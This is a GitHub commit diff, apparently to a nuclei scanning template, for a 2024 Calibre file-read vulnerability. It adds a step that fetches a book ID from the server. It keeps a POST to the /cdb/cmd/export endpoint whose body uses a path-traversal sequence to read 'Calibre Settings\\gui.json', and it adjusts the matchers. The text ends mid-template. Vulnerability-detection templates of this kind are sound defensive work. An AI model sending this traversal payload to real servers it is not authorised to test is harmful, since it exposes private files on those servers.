minor-update

main
Dhiyaneshwaran 2024-08-01 12:18:36 +05:30 committed by GitHub
parent 5ae2718cb2
commit d284320ff9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 3 deletions

View File

@ -16,25 +16,39 @@ info:
tags: cve,cve2024,calibre,lfi
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/export HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["extra_file", 1, "..\\..\\..\\Calibre Settings\\gui.json", ""]
["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""]
matchers-condition: and
matchers:
- type: word
part: header
part: content_type
words:
- "application/json"
- type: word
part: body
words:
- "label"
- "No such file or directory:"
- "Traceback"
condition: and
- type: status
status: